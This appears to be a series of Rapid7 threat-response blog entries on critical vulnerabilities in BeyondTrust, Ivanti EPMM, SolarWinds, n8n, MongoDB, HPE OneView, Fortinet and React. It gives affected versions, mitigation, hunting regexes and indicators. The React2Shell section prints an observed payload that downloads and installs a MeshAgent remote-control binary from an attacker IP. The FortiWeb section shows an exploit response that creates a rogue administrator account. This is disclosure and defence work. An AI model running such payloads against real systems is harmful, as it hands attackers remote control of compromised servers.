Overview

On February 6, 2026, BeyondTrust released security advisory BT26-02, disclosing a critical pre-authentication Remote Code Execution (RCE) vulnerability affecting its Remote Support (RS) and Privileged Remote Access (PRA) products. Assigned CVE-2026-1731 and a near-maximum CVSSv4 score of 9.9, the flaw allows unauthenticated, remote attackers to execute arbitrary operating system commands in the context of the site user by sending specially crafted requests. The vulnerability affects Remote Support (RS) versions 25.3.1 and prior, as well as Privileged Remote Access (PRA) versions 24.3.4 and prior. 

While BeyondTrust automatically patched SaaS instances on February 2, 2026, self-hosted customers remain at risk until manual updates are applied. The issue was discovered by researchers at Hacktron AI using AI-enabled variant analysis; they identified approximately 8,500 on-premises instances exposed to the internet that could be susceptible to this straightforward exploitation vector. 

While BeyondTrust has not reported active exploitation of CVE-2026-1731 in the wild, the platform’s immense footprint makes it a high-priority target for sophisticated adversaries. BeyondTrust provides identity security services to more than 20,000 customers across over 100 countries, including 75% of the Fortune 100. This ubiquity has attracted state-sponsored actors in the past; notably, the Chinese hacking group "Silk Typhoon" weaponized previous zero-day flaws (CVE-2024-12356 and CVE-2024-12686) to breach the U.S. Treasury Department and access sensitive data related to sanctions, triggering emergency directives from CISA. Rapid7 research later revealed that the exploitation of CVE-2024-12356 actually required chaining it with a critical, then-unknown SQL injection vulnerability in an underlying PostgreSQL tool (CVE-2025-1094). Given this history of targeted attacks against such a widely used platform, these tools remain a critical attack vector that demands immediate defensive action.

Mitigation guidance

A vendor-provided patch is available to remediate CVE-2026-1731 in on-premise deployments.

BeyondTrust Remote Support (RS):

• Versions 25.3.1 and prior are affected by CVE-2026-1731.

• CVE-2026-1731 is fixed in 25.3.2 and later.

BeyondTrust Privileged Remote Access (PRA):

• Versions 24.3.4 and prior are affected by CVE-2026-1731.

• CVE-2026-1731 is fixed in 25.1.1 and later.

Please read the vendor advisory for the latest guidance.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess exposure to CVE-2026-1731 on Remote Support and Privileged Remote Access using authenticated checks available in the Feb 9 content release.

Updates

• February 11, 2026: Updated Rapid7 customers section to confirm checks were available on February 9.

Overview

On January 29, 2026, Ivanti disclosed two new critical vulnerabilities affecting Endpoint Manager Mobile (EPMM): CVE-2026-1281 and CVE-2026-1340. The vendor has indicated that exploitation in the wild has already occurred prior to disclosure. This has been echoed by CISA who added CVE-2026-1281 to their Known Exploited Vulnerabilities (KEV) catalog shortly after the vendor disclosure. As an indication of how critical this development is, CISA has given a “due date” of only 3 days (Due Feb 1, 2026) for organizations, such as federal agencies, to remediate the vulnerabilities before the affected devices must be removed from a network.

While CVE-2026-1281 has been confirmed as exploited in the wild as a zero day, it is unclear if CVE-2026-1340 has also, or if this vulnerability was found separately to CVE-2026-1281. The two critical vulnerabilities are summarized below.

⠀

⠀

Both CVE-2026-1281 and CVE-2026-1340 are described identically by the vendor; they are code injection issues, allowing a remote unauthenticated attacker to execute arbitrary code on an affected device. Based on the vendor's guidance, the attackers can provide Bash commands as part of a malicious HTTP GET request to the endpoints that service either the “In-House Application Distribution” feature (i.e. /mifs/c/appstore/fob/) or the “Android File Transfer Configuration” feature (i.e. /mifs/c/aftstore/fob/), resulting in arbitrary OS command execution on the target. 

As EPMM is an endpoint management solution for mobile devices, the impact of an attacker compromising the EPMM server is significant. An attacker may be able to access Personally Identifiable Information (PII) regarding mobile device users, such as their names and email addresses, but also their mobile device information, such as their phone numbers, GPS information, and other sensitive unique identification information. This is in addition to the privileged position an attacker will have on the EPMM device itself, which may allow for lateral movement within the compromised network.
Given the nature of the product, EPMM is a high-profile target. It has been repeatedly targeted by zero-day vulnerabilities in the past. In 2023 the product was exploited in the wild via CVE-2023-35078, and again in 2025 via an exploit chain of CVE-2025-4427 and CVE-2025-4428. As of January 30, 2026, a public working proof-of-concept exploit for remote code execution is available. Organizations running EPMM are urged to act quickly and follow the vendor guidance to remediate these issues.

Threat hunting 

The following vendor supplied regular expression can be used to search the HTTP daemon’s log files for evidence of potential exploitation of CVE-2026-1281 and CVE-2026-1340:⠀

^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404

Mitigation guidance

A vendor supplied update is available to remediate both vulnerabilities.

The following affected versions of Ivanti EPMM are remediated via the RPM 12.x.0.x patch:

• Versions 12.7.0.0 and below

• Versions 12.6.0.0 and below

• Versions 12.5.0.0 and below

The following affected versions of Ivanti EPMM are remediated via the RPM 12.x.1.x patch:

• Versions 12.6.1.0 and below

• Versions 12.5.1.0 and below

Customers are advised to update to the latest remediated version of EPMM, on an emergency basis outside of normal patching cycles, as exploitation in-the-wild is already occurring.

For the latest mitigation guidance for Ivanti EPMM, please refer to the vendor’s security advisory. In addition to remediation, the vendor has provided additional threat hunting guidance.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-1281 and CVE-2026-1340 with authenticated vulnerability checks expected to be available in today's (Jan 30) content release. Note that the "Potential" category must be enabled in the scan template to run the checks.

Updates

• January 30, 2026: Added reference to the watchTowr technical analysis and proof-of-concept exploit.

Overview

On January 28, 2026, SolarWinds published an advisory for multiple new vulnerabilities affecting their Web Help Desk product. Web Help Desk is an IT help desk ticketing and asset management software solution. Of the six new CVEs disclosed in the advisory, four are critical, and allow a remote attacker to either achieve unauthenticated remote code execution (RCE) or bypass authentication. 

As of this writing, there is currently no known in-the-wild exploitation occurring. However, we expect this to change as and when technical details become available. Notably, this product has been featured on CISA’s Known Exploited Vulnerabilities (KEV) list twice in the past, circa 2024, indicating that it is a target for real-world attackers.

The six vulnerabilities are summarized below.

Update #1: On February 3, 2026, the unsafe deserialization vulnerability, CVE-2025-40551, was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.

Update #2: On February 12, 2026, the access control bypass vulnerability, CVE-2025-40536, was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.

Technical overview

Both CVE-2025-40551 and CVE-2025-40553 are critical deserialization of untrusted data vulnerabilities that allow a remote unauthenticated attacker to achieve RCE on a target system and execute payloads such as arbitrary OS command execution. RCE via deserialization is a highly reliable vector for attackers to leverage, and as these vulnerabilities are exploitable without authentication, the impact of either of these two vulnerabilities is significant.

The other two critical vulnerabilities, CVE-2025-40552 and CVE-2025-40554, are authentication bypasses that allow a remote unauthenticated attacker to execute actions or methods on a target system which are intended to be gated by authentication. Based upon the vendor supplied CVSS scores for these two authentication bypass vulnerabilities, the impact is equivalent to the two RCE deserialization vulnerabilities, likely meaning they can also be leveraged for RCE.

In addition to the four critical vulnerabilities, two high severity vulnerabilities were also disclosed. CVE-2025-40536 is an access control bypass vulnerability, allowing an attacker to access functionality on the target system that is intended to be restricted to authenticated users. Separately, CVE-2025-40537 may, under certain conditions, allow access to some administrative functionality on the target system due to the existence of hardcoded credentials. 

A full technical analysis of CVE-2025-40551, CVE-2025-40536, and CVE-2025-40537 has been published by the original finders, Horizon3.ai.

Mitigation guidance

A vendor supplied update is available to remediate all six vulnerabilities: CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554, CVE-2025-40536, and CVE-2025-40537. The following product versions are affected:

• SolarWinds Web Help Desk versions 12.8.8 Hotfix 1 and below.

Customers are advised to update to the latest Web Help Desk version, 2026.1, on an urgent basis outside of normal patching cycles.

For the latest mitigation guidance for SolarWinds Web Help Desk, please refer to the vendor’s security advisory.

Rapid7 customers

Exposure Command, InsightVM and Nexpose customers can assess their exposure to CVE-2025-40551, CVE-2025-40552, CVE-2025-40553 CVE-2025-40554 with remote vulnerability checks available in the Jan 28 content release.

Updates

• January 28, 2026: Added reference to the Horizon3.ai technical analysis.
• January 29, 2026: Updated coverage information
• February 3, 2026: Updated Overview to add a reference to CVE-2025-40551 being added to the CISA KEV list.
• February 13, 2026: Updated Overview to add a reference to CVE-2025-40536 being added to the CISA KEV list.

Overview

On November 18, 2025, a patched release was published for a critical unauthenticated file read vulnerability in n8n, a popular piece of automation software. The advisory for this vulnerability, CVE-2026-21858, was subsequently published on January 7, 2026; the vulnerability holds a CVSS score of 10.0. If a server has a custom configured web form that implements file uploads with no validation of content type, an attacker can overwrite an internal JSON object to read arbitrary files and, in some cases, establish remote code execution. This vulnerability has been dubbed “Ni8mare” by the finders. 

The finders, Cyera, published a technical blog post about the vulnerability on January 7, 2026, and a separate technical analysis and proof-of-concept (PoC) exploit were published by third-party security researcher Valentin Lobstein the same day. The Cyera writeup demonstrates CVE-2026-21858, while the third-party exploit also leverages CVE-2025-68613, an authenticated expression language injection vulnerability in n8n, for remote code execution. Additional authenticated vulnerabilities, tracked as CVE-2025-68613, CVE-2025-68668, CVE-2025-68697, and CVE-2026-21877 can be chained with the unauthenticated vulnerability CVE-2026-21858 for code execution or arbitrary file write on specific affected versions of n8n.

In total there are five CVEs that n8n users should be aware of:

Technical overview

CVE-2026-21858: “Unauthenticated File Access via Improper Webhook Request Handling”

This is the primary access vector for the n8n exploit chain and holds a maximum CVSS score of 10.0. It is a critical unauthenticated file read vulnerability that occurs when custom web forms implement file uploads without validating the content type. By exploiting this flaw, an attacker can overwrite an internal JSON object to read arbitrary files from the server. This capability may be leveraged to forge an administrator session token and exploit subsequent authenticated vulnerabilities for code execution.

CVE-2025-68613: “Remote Code Execution via Expression Injection”

This vulnerability is characterized as an authenticated expression language injection flaw. While it requires an established session to exploit, it can be chained with CVE-2026-21858 to achieve remote code execution. It affects n8n versions starting at 0.211.0 and below 1.20.4. Attackers can leverage this flaw by injecting malicious expression language commands once they have gained a foothold as an administrator.

CVE-2025-68668: “Arbitrary Command Execution in Pyodide based Python Code node”

Affecting n8n versions between 1.0.0 and 2.0.0, this is an authenticated vulnerability used for secondary exploitation. Depending on the specific configuration of the affected version, it allows an attacker to execute arbitrary OS commands. Because it requires authentication, it is used on a case-by-case basis after an initial breach has compromised the management interface.

CVE-2025-68697: “Legacy Code node enables file read/write in self-hosted n8n”

CVE-2025-68697 is an authenticated vulnerability that facilitates arbitrary file read/write in the context of the n8n process when exploited. Per the advisory, systems are vulnerable when the Code node runs in legacy (non-task-runner) JavaScript execution mode. CVE-2025-68697 specifically impacts n8n versions ranging from 1.2.1 up to 2.0.0, though n8n version 1.2.1 and higher automatically prevents read/write access to the `.n8n` directory by default. As a result, exploitation of CVE-2025-68697 is likely to require a more bespoke strategy for each specific target, making it a less likely vulnerability to be exploited as a secondary chained bug with CVE-2026-21858.

CVE-2026-21877: “RCE via Arbitrary File Write”

This vulnerability has a CVSS score of 9.9 and affects both self-hosted and cloud versions of n8n. It allows for remote code execution within n8n versions 0.123.0 through 1.121.3. Although it is an authenticated vulnerability, its high severity stems from its ability to grant an attacker full system control once they have bypassed initial authentication using the CVE-2026-21858 file read flaw.

Mitigation guidance

Organizations running self-hosted instances of n8n should prioritize upgrading to a version at or above 1.121.0 immediately to remediate the unauthenticated initial access vulnerability CVE-2026-21858.

According to the vendor, the following versions are affected:

• CVE-2026-21858: Versions at or above 1.65.0 and below 1.121.0.

• CVE-2025-68613: Versions at or above 0.211.0 and below 1.20.4.

• CVE-2025-68668: Versions at or above 1.0.0 and below 2.0.0.

• CVE-2025-68697: Versions at or above 1.2.1 and below 2.0.0.

• CVE-2026-21877: Versions at or above 0.123.0 and below 1.121.3.

For the latest mitigation guidance, please refer to the vendor’s security advisories.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess exposure to CVE-2026-21858, CVE-2025-68613, CVE-2025-68668, CVE-2025-68697, CVE-2026-21877 with vulnerability checks available in the January 9th content release.

Updates

• January 8, 2026: Initial publication.

• January 12, 2026: Updated Rapid7 customers section to confirm checks shipped on January 9, 2026.

Overview

On December 19, 2025, MongoDB Inc. disclosed a critical new vulnerability, CVE-2025-14847, which has since been dubbed MongoBleed. This vulnerability is a high-severity unauthenticated memory leak affecting MongoDB, one of the world's most popular document-oriented databases. While initially identified as a data exposure flaw, the severity is underscored by the fact that it allows attackers to bypass authentication entirely to extract sensitive information directly from server memory. On December 26, 2025, public proof-of-concept (PoC) exploit code was published and on December 29th, 2025 exploitation in-the-wild has been confirmed.

While CVE-2025-14847 is rated as a high-severity vulnerability, CVSS 8.7, its impact is critical. Successful exploitation allows a remote, unauthenticated attacker to "bleed" uninitialized heap memory from the database server by manipulating Zlib-compressed network packets. This memory often contains high-value secrets such as cleartext credentials, authentication tokens, and sensitive customer data from other concurrent sessions. Because the vulnerability returns "uninitialized heap memory," an attacker cannot target specific credentials or data records with precision; they must instead rely on repeated exploitation attempts and chance to capture sensitive information.

The vulnerability specifically affects MongoDB servers configured to use the Zlib compression algorithm for network messages, which is a common configuration in many production environments. It affects a wide range of versions, including the 4.4, 5.0, 6.0, 7.0, and 8.0 branches. Older, End-of-Life (EOL) versions are also believed to be vulnerable but will not receive official patches, leaving users of legacy systems at significant continued risk.

As of this writing, the public PoC has been successfully verified by Rapid7 Labs. Unlike scenarios where valid exploits are initially scarce, the exploit for MongoBleed is functional and reliable.

Organizations running self-managed MongoDB instances are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles. Given the nature of the leak, simply patching is insufficient; organizations are advised to also rotate all database and application credentials that may have been exposed prior to remediation.

Mitigation guidance

CVE-2025-14847 affects a wide range of versions, including the 4.4, 5.0, 6.0, 7.0, and 8.0 branches. Older, End-of-Life (EOL) versions are also believed to be vulnerable but will not receive official patches, leaving users of legacy systems at significant continued risk. Organizations managing their own MongoDB instances should prioritize upgrading to the fixed versions released by the vendor (e.g., 8.0.4, 7.0.16, 6.0.20, etc.) immediately. This is the only complete remediation for the vulnerability. 

If an immediate upgrade is not feasible, or if the organization is running an End-of-Life (EOL) version that will not receive a patch, the risk can be effectively mitigated by disabling the Zlib network compressor in the server configuration. This prevents the specific memory allocation path used by the exploit.

In addition, because CVE-2025-14847 allows for the exfiltration of credentials and session tokens from server memory, patching alone is insufficient to ensure security. Administrators should assume that any secrets residing in the database memory prior to patching may have been compromised; therefore, all database passwords, API keys, and application secrets should be rotated immediately after the vulnerability is remediated. 

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2025-14847 with a vulnerability check expected to be available in today's (Dec 29) content release.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-14847, including a Suricata rule. 

Rapid7 observations

Rapid7 Labs has become aware of a new exploitation tool that streamlines the extraction of sensitive data from vulnerable MongoDB instances. This utility introduces a graphical user interface that allows an attacker to either batch-dump 10MB of memory or monitor the extraction process via a live visual feed. Rapid7 Labs has confirmed the tool operates as described, as demonstrated in the video below.

Detection and Hunting

Velociraptor 

Velociraptor published a Linux.Detection.CVE202514847.MongoBleed hunting artifact written by Eric Capuano designed to detect indicators related to CVE-2025-14847 memory leakage activity. This artifact enables defenders to proactively identify suspicious network or process behaviors consistent with mangled Zlib protocol abuse.

Updates

• December 29, 2025: Initial publication

• December 29, 2025: "Rapid7 Observations" section added with video

• December 29, 2025: Added exploitation confirmation

Overview

On December 17, 2025, Hewlett Packard Enterprise (HPE) published an advisory for CVE-2025-37164, a CVSS 10.0 vulnerability in HPE OneView. The vulnerability, which was reported to HPE by security researcher Nguyen Quoc Khanh, facilitates unauthenticated remote code execution (RCE) on versions of HPE OneView before 11.0. Defenders are advised to prioritize upgrading to version 11.0 or applying the emergency hotfixes (HPE OneView virtual appliance hotfix, HPE Synergy hotfix) as soon as possible.

OneView sits at a privileged control plane for enterprise infrastructure, so successful exploitation isn’t just about establishing remote code execution, it’s about gaining centralized control over servers, firmware, and lifecycle management at scale. The real concern here is exposure and trust assumptions. Management platforms are often deployed deep inside the network with broad privileges and minimal monitoring because they’re ‘supposed’ to be trusted. When an unauthenticated RCE shows up in that layer, defenders need to treat it as an assumed-breach scenario, prioritize patching immediately, and review access paths and segmentation.

Update #1: A Rapid7 technical analysis of CVE-2025-37164 has been published on AttackerKB, and a Metasploit module is now available.

Update #2: On January 7, 2026, CVE-2025-37164 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation.

Hotfix analysis

Rapid7 Labs has begun an initial analysis of the vendor-supplied hotfix HPE_OneView_CVE_37164_Z7550-98077.bin. This hotfix applies a new HTTP rule to the appliance’s webserver to block access to a specific REST API endpoint. This endpoint is /rest/id-pools/executeCommand. Initial inspection of the appliance code indicates this endpoint is reachable without authentication. Rapid7 Labs assesses with a high degree of confidence that this is the access vector for triggering the vulnerability and achieving remote code execution.

Mitigation guidance

According to HPE, CVE-2025-37164 affects HPE OneView versions below 11.0, version 5.20 through version 10.20, unless a security hotfix (HPE OneView virtual appliance hotfix, HPE Synergy hotfix) has been applied.

For the latest mitigation guidance for HPE OneView, please refer to the vendor’s security advisory.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2025-37164 with an unauthenticated vulnerability check expected to be available in today's (December 18) content release.

Updates

• December 18, 2025: Initial publication.
• December 19, 2025: Updated to link to the new Rapid7 technical analysis and Metasploit module for CVE-2025-37164.
• January 8, 2026: Updated Overview to add a reference to the CISA KEV list.

Overview

Update for CVE-2026-24858: On January 27, 2026, Fortinet disclosed CVE-2026-24858, a critical unauthenticated vulnerability allowing authentication bypass via Fortinet’s cloud SSO. Confirmed as a net-new vulnerability rather than a patch bypass, it has been observed under active zero-day exploitation. The issue affects FortiAnalyzer, FortiManager, FortiOS, and FortiProxy. However, because Fortinet has deployed a fix to the cloud environment, a client-side patch is not required to prevent exploitation. Please refer to the ‘Mitigation guidance’ section for further details.

A recently disclosed pair of vulnerabilities affecting Fortinet devices—CVE-2025-59718 and CVE-2025-59719—are drawing urgent attention after confirmation of their active exploitation in the wild. The vulnerabilities carry a critical CVSSv3 score and allow an unauthenticated remote attacker to bypass authentication using a crafted SAML message, ultimately gaining administrative access to the device. Current information indicates that the two CVEs have the same root cause and are differentiated by the products affected: CVE-2025-59719 specifically affects FortiWeb, while CVE-2025-59718 affects FortiOS, FortiProxy, and FortiSwitchManager.

While the vulnerable FortiCloud SSO feature is disabled by default in factory settings, it is automatically enabled when a device is registered to FortiCare via the GUI, unless an administrator explicitly opts out. This behavior significantly increases the likelihood of exposure across registered deployments. Arctic Wolf has confirmed active exploitation and CVE-2025-59718 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on December 16.

Observed attacks show threat actors authenticating as the admin user and immediately downloading the system configuration file, which often contains hashed credentials. As a result, any organization with indicators of compromise must assume credential exposure and respond accordingly.

Rapid7 observations

Rapid7 initially observed CVE-2025-59718 exploitation attempts against honeypots on December 17, 2025, alongside a proof-of-concept exploit on GitHub resembling those requests. Update as of January 16, 2026, Rapid7 has identified threat actors actively exploiting authentication bypass vulnerabilities CVE-2025-59718 and CVE-2025-59719 on vulnerable FortiGate devices exposed to the public internet.

Mitigation guidance

• CVE-2025-59718 and CVE-2025-59719:

• Fortinet has published an advisory that lists fixed versions for CVE-2025-59718 and CVE-2025-59719.

• CVE-2026-24858:

• According to Fortinet’s advisory, a patch deployed to their own FortiCloud SSO infrastructure on January 26, 2026 has remediated the vulnerability. However, patched software is available for customers, since the cloud-side fix introduces breaking changes to the FortiCloud SSO login protocol. Because of this, fixed versions are listed, along with IoCs from exploitation in the wild.

• Per Fortinet, FortiAnalyzer, FortiManager, FortiOS, and FortiProxy are confirmed to be affected, and a vendor investigation is ongoing (as of January 27, 2026) to determine if FortiWeb and FortiSwitchManager are affected.

• For the latest information, please refer to the official Fortinet advisory for CVE-2026-24858.

Rapid7 customers

Exposure Command, InsightVM and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess their exposure to CVE-2025-59718 and CVE-2025-59719 with authenticated vulnerability checks available in the December 17 content release.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-59718 and CVE-2025-59719, including indicators of compromise (IOCs).

Updates

• December 17, 2025: Initial publication.

• December 17, 2025: Coverage updated.

• December 18, 2025: Added Intelligence Hub section.
• January 16, 2026: Active exploitation observed.

• January 26, 2026: Added information about the January, 2026 advisory blog post and the new recommended mitigation steps.

• January 27, 2026: Added information about CVE-2026-24858.

Overview

Update #1: As of 4:30 PM Eastern, December 4, 2025, Rapid7 has validated that a working weaponized proof-of-concept exploit, shared by researcher @maple3142, is now publicly available.

Update #2: On December 5, 2025, Lachlan Davidson who discovered the vulnerability has also published a proof-of-concept. A Metasploit exploit module is also available.

Update #3: At 10:00 AM Eastern, December 5, 2025, CVE-2025-55182 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), confirming exploitation in-the-wild has begun.

On December 3, 2025, Meta disclosed a new vulnerability, CVE-2025-55182, which has since been dubbed React2Shell. A second CVE identifier, CVE-2025-66478, was assigned and published to track the vulnerability in the context of Next.js. However this second CVE has since been rejected as a duplicate of CVE-2025-55182, as the root cause in all cases is the same and should be referred to with a single common CVE identifier.

CVE-2025-55182 is a critical unauthenticated remote code execution vulnerability affecting React, a very popular library for building modern web applications. This new vulnerability has a CVSS rating of 10.0, which is the maximum rating possible and indicates the highly critical nature of the issue. Successful exploitation of CVE-2025-55182 allows a remote unauthenticated attacker to execute arbitrary code on an affected server via malicious HTTP requests.

The vulnerability affects React applications that support React Server Components. While the vulnerability affects the React Server Components feature, server applications may still be vulnerable even if the application does not explicitly implement any React Server Function endpoints but does support React Server Components. Additionally, many popular frameworks based on React, such as Next.js, are also affected by this vulnerability.

A separate advisory was published by Vercel, the vendor for Next.js. This advisory tracks the impact of CVE-2025-55182 as it applies to the Next.js framework, and provides information for Next.js users to remediate the issue. 

As of this blog’s publication on December 4, 2025, there is no known public exploit code available. Several exploits have been published claiming to exploit CVE-2025-55182; however, they have not been successfully verified as actually exploiting this vulnerability. This has been noted in the original finder’s website, react2shell.com. Although broad exploitation has not yet begun, we expect this to quickly change once a viable public exploit becomes available.

Organizations who use React or the affected downstream frameworks are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles and before broad exploitation begins.

Mitigation guidance

CVE-2025-55182 affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following React packages:

• react-server-dom-webpack

• react-server-dom-parcel

• react-server-dom-turbopack

A vendor-supplied update for the above packages is available in versions 19.0.1, 19.1.2, and 19.2.1. Users of affected React packages are advised to update to the latest remediated version on an urgent basis.

Downstream frameworks that depend on React are also affected, this includes (but is not limited to):

• Next.js

• React Router

• Waku

• Parcel

• Vite

• RedwoodSDK

For the latest mitigation guidance for React, please refer to the React security advisory. For the latest mitigation guidance specific to Next.js, please refer to the Vercel security advisory.

Rapid7 customers

Exposure Command, InsightVM and Nexpose

An unauthenticated check for CVE-2025-55182 has been available to Exposure Command, InsightVM and Nexpose customers since the December 4th content release. Note that the first iteration of the check was a "potential" type check which was later revised to a non-potential (normal remote check) one on Friday, the 5th December.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-55182, including indicators of compromise (IOCs), Yara and Sigma rules.

Observed exploitation

As of December 8, 2025, Rapid7 honeypots have observed exploitation attempts of CVE-2025-55182 using the same RCE technique from the PoC published on December 4, 2025. While the exploit attempts seen on our honeypots match the RCE technique from that original PoC, the actual payloads being delivered (i.e. what the attackers are trying to execute on a compromised server), are now different and show malicious intent.

One such example we are seeing is the deployment of MeshAgent remote control software, which if successful will allow an attacker to remotely control newly compromised systems from a centralized location. The decoded malicious payload command can be seen here:

[ "$EUID" -eq 0 ] && URL="https://156.67.221.96/meshagents?id=hrfDDhB%40yNf4oBrCH%40R%24KfVp27XfA78LiX%40IZUxoTgs3zCwG%24bjdpR%400oa8%40BhTf&installflags=0&meshinstall=6" || URL="https://156.67.221.96/meshagents?id=yGNhrz51DRyitgqtVyaSjJU3GsIKSJpCfD5aQ%24QPcbjBXNVeFkiZg1LAmWYOQyP4&installflags=0&meshinstall=6"; wget -O /tmp/meshagent --no-check-certificate "$URL" && chmod +x /tmp/meshagent && cd /tmp/ && ([ "$EUID" -eq 0 ] && ./meshagent -install || ./meshagent -connect)

The behavior of this payload is shown below.

Indicators of compromise (IOCs)

IP Addresses

• 156.67.221[.]96

Updates

• December 4, 2025: Several minor edits for punctuation and grammar.
• December 4, 2025: Coverage availability for Rapid 7 customers.
• December 4, 2025: PoC validation updated.
• December 5, 2025: The original finder has also published their PoC. A Metasploit exploit is available.
• December 5, 2025: Added reference to CISA KEV.
• December 8, 2025: Updated coverage information.
• December 8, 2025: Added Intelligence Hub coverage to the Rapid7 customers section. Added an Observed exploitation section.

Overview

On October 6, 2025, the cyber deception company Defused published a proof-of-concept exploit on social media that was captured by one of their Fortinet FortiWeb Manager honeypots. FortiWeb is a Web Application Firewall (WAF) product that is designed to detect and block malicious traffic to web applications. Exploitation of this new vulnerability, now tracked as CVE-2025-64446, allows an attacker with no existing level of access to gain administrator-level access to the FortiWeb Manager panel and websocket command-line interface. Rapid7 has tested the latest FortiWeb version 8.0.2 and observed that the existing public proof-of-concept exploit does not work. However, the exploit does work against earlier versions, including version 8.0.1, which was released in August, 2025. 

Based on the information circulated by Defused, this new vulnerability is claimed to have been exploited in the wild in October, 2025. On November 14, 2025, Fortinet PSIRT published CVE-2025-64446 and an official advisory for the critical vulnerability, which holds a CVSS score of 9.1. Organizations running versions of Fortinet FortiWeb that are listed as affected in the advisory are advised to remediate this vulnerability on an emergency basis, given that exploitation has been occurring since October in targeted attacks, and broad exploitation will likely occur in the coming days. A Metasploit module for CVE-2025-64446 is available here, and security firm watchTowr has published a technical analysis. CISA's KEV catalog has been updated to include CVE-2025-64446.

It’s unclear whether the FortiWeb release cycle intentionally included a silent patch for this vulnerability or merely coincidentally included changes that broke the existing exploit.

On November 18, 2025, Fortinet published a new advisory for CVE-2025-58034. This new vulnerability is an authenticated command injection affecting FortiWeb. Fortinet has indicated CVE-2025-58034 has also been exploited in-the-wild, and CISA's KEV catalog has been updated to include this new vulnerability. It is not clear at this time if both CVE-2025-64446 and CVE-2025-58034 have been exploited in-the-wild together as an exploit chain.

This blog post will be updated as new developments arise.

Rapid7 observations

On November 6, 2025, Rapid7 Labs observed that an alleged zero-day exploit targeting FortiWeb was published for sale on a popular black hat forum. While it is not clear at this time if this is the same exploit as the one described above, the timing is coincidental.

⠀

Mitigation guidance

On November 14, 2025, Fortinet published an advisory that outlines remediation steps and workaround mitigations for CVE-2025-64446. According to Fortinet, the following versions are affected, and the fixed versions for each main release branch are also listed:

• Versions 8.0.0 through 8.0.1 are vulnerable, 8.0.2 and above are fixed.
• Versions 7.6.0 through 7.6.4 are vulnerable, 7.6.5 and above are fixed.
• Versions 7.4.0 through 7.4.9 are vulnerable, 7.4.10 and above are fixed.
• Versions 7.2.0 through 7.2.11 are vulnerable, 7.2.12 and above are fixed.
• Versions 7.0.0 through 7.0.11 are vulnerable, 7.0.12 and above are fixed.
  

In cases where immediate upgrades are not possible, the advisory states the following: “Disable HTTP or HTTPS for internet facing interfaces. Fortinet recommends taking this action until an upgrade can be performed. If the HTTP/HTTPS Management interface is internally accessible only as per best practice, the risk is significantly reduced.”

Rapid7 Labs has confirmed that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034. Customers using unsupported versions of FortiWeb should update to a supported version, as described above.

Exploitation behavior

When testing the public exploit against a target FortiWeb device, the target application’s differing responses between versions 8.0.1 and 8.0.2 are included below.

Against version 8.0.1, the application returns the following response for a successful exploitation attempt, in which a new malicious local administrator account “hax0r” was created:

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2025 17:57:28 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1202

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "hax0r", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763056648, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }

⠀

However, against version 8.0.2, the application returns the following “403 Forbidden” response for an unsuccessful exploitation attempt:

⠀

HTTP/1.1 403 Forbidden
Date: Thu, 13 Nov 2025 17:28:42 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
